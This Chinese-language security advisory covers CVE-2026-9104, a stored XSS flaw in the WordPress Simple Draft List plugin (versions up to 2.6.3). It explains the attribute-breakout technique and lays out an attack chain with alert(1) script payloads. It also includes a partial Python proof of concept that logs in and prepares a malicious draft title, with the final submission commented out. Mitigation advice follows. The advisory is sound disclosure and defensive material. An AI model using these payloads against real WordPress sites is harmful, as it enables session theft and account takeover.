CVE-2026-9104 WordPress Draft List插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2026-9104

漏洞类型

存储型跨站脚本 (Stored XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Simple Draft List Plugin

漏洞概述

WordPress的Draft List插件在包括2.6.3及以下的所有版本中存在存储型XSS漏洞。由于对草稿文章标题的输入清理和输出转义不足，经过身份验证的攻击者（作者级及以上）可以通过标题注入恶意脚本。当没有编辑权限的用户（如未授权用户或订阅者）访问受影响的页面时，这些脚本将会执行，从而导致账号被盗取或恶意操作。

技术细节

该漏洞的核心在于WordPress Draft List插件在渲染前端列表时，对草稿文章标题的输出转义逻辑存在缺陷。攻击者利用“属性突破”技术，在草稿标题中注入恶意JavaScript代码。具体而言，插件代码在生成列表项时，直接将标题拼接到HTML属性中，且未使用`esc_attr`等函数进行转义。漏洞触发具有特定的权限逻辑：当访问用户不具备编辑该草稿的权限（如订阅者或未登录访客）时，系统不会显示编辑链接，从而绕过了部分安全渲染逻辑，导致恶意载荷直接嵌入DOM并在受害者浏览器中执行。这种存储型XSS使得攻击者能够窃取Cookie、会话令牌或重定向用户，对网站安全构成严重威胁。

攻击链分析

STEP 1

1. 获取权限

攻击者注册或获取一个具有作者及以上权限的WordPress账户。

STEP 2

2. 注入Payload

攻击者在后台创建一篇新草稿，在“标题”字段中使用属性突破技术注入JavaScript代码（例如：\"><script>alert(1)</script>）。

STEP 3

3. 存储数据

由于插件未对标题进行充分过滤，恶意代码被存储在数据库中。

STEP 4

4. 触发漏洞

当没有编辑权限的用户（如订阅者或未登录访客）访问使用了Draft List插件显示草稿列表的页面时，插件直接输出未转义的标题。

STEP 5

5. 执行攻击

受害者的浏览器解析恶意HTML/JS，导致脚本在受害者上下文中执行，窃取Cookie或进行其他恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: WordPress Simple Draft List Plugin < 2.6.4 - Stored XSS (Author+)
# Date: 2026-05-22
# Exploit Author: Analyst
# Vendor Homepage: https://wordpress.org/plugins/simple-draft-list/
# Version: <= 2.6.3

def exploit(target_url, username, password):
    session = requests.Session()
    
    # 1. Login to get auth cookies
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/"
    }
    session.post(login_url, data=login_data)
    
    # 2. Create a new draft post with malicious payload in title
    # Payload utilizes attribute breakout technique
    payload = '"><img src=x onerror=alert(1)>'
    post_url = f"{target_url}/wp-admin/post-new.php"
    
    # Fetch nonce first
    post_page = session.get(post_url)
    # Note: In a real exploit, parse the '_wpnonce' from post_page.text here
    
    draft_data = {
        'post_title': payload,
        'content': 'This is a test draft for XSS.',
        'post_status': 'draft',
        # '_wpnonce': '...' 
        # 'action': 'editpost',
        # ... other WP form fields
    }
    
    # session.post(post_url, data=draft_data)
    print(f"[+] Payload injected into draft title: {payload}")
    print(f"[+] Trigger: Visit a page displaying the draft list as a Subscriber/Guest.")

if __name__ == "__main__":
    # Example usage
    exploit("http://target-site.com", "author", "password")

影响范围

Simple Draft List Plugin <= 2.6.3

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用 Simple Draft List 插件，直到应用了安全补丁。同时，限制用户的注册权限，仅允许可信用户注册为作者或更高权限角色。